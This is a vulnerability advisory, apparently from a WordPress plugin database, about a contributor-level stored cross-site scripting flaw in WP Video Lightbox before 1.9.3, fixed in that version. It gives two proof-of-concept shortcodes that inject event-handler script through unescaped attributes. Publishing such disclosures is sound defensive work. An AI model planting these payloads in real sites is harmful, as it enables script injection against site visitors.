WordPress Plugin Vulnerabilities

WP Video Lightbox < 1.9.3 - Contributor+ Stored Cross-Site Scripting

Description

The plugin does not escape the attributes of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks

Proof of Concept

[video_lightbox_vimeo5 video_id='"onmouseover=alert(/XSS/) b="' width="640" height="480" anchor="Click here to open vimeo video"]

[video_lightbox_vimeo5 video_id="13562192" width="640" height="480" anchor='http"onerror=alert(/XSS/)//']

Affects Plugins

Fixed in 1.9.3

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Vishnupriya Ilango of Fortinet Fortiguard Labs
Submitter
Vishnupriya Ilango
Verified
Yes

Timeline

Publicly Published
2021-08-23 (about 2 years ago)
Added
2021-08-23 (about 2 years ago)
Last Updated
2022-03-07 (about 1 years ago)

Other